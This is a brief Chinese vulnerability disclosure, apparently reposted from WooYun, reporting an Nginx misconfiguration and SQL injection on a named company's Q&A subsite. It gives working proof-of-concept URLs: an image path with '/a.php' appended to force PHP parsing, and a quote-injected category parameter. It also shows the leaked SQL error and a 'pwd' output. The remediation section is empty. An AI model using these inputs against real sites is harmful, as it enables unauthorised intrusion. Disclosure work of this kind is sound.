首页 » 漏洞 » 爱丽网旗下某分站Nginx配置不当存在命令执行漏洞

爱丽网旗下某分站Nginx配置不当存在命令执行漏洞

 

WooYun: 爱丽旗下分站Nginx PHP代码解析漏洞大合集

通过历史漏洞发现533.com是爱丽网旗下的网站

http://ask.533.com/public/upload/53abd86fdca51.jpg

http://ask.533.com/public/upload/53abd86fdca51.jpg/a.php

SQL 注入

code 区域
http://ask.533.com/home/questlist/index/cid/111'

爱丽网旗下某分站Nginx配置不当存在命令执行漏洞

http://ask.533.com/home/questlist/index/cid/acu3754%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3754

code 区域
A Database Error Occurred

Error Number: 1054

Unknown column '3754<s1﹥s2ʺs3ʹuca3754' in 'where clause'

select cat_name,style from ask_category where 1 and cat_id=3754<s1﹥s2ʺs3ʹuca3754

漏洞证明:

$pwd

/www/data/ask_533_com/models/home/

爱丽网旗下某分站Nginx配置不当存在命令执行漏洞

修复方案:

修复

原文链接:爱丽网旗下某分站Nginx配置不当存在命令执行漏洞,转载请注明来源!

0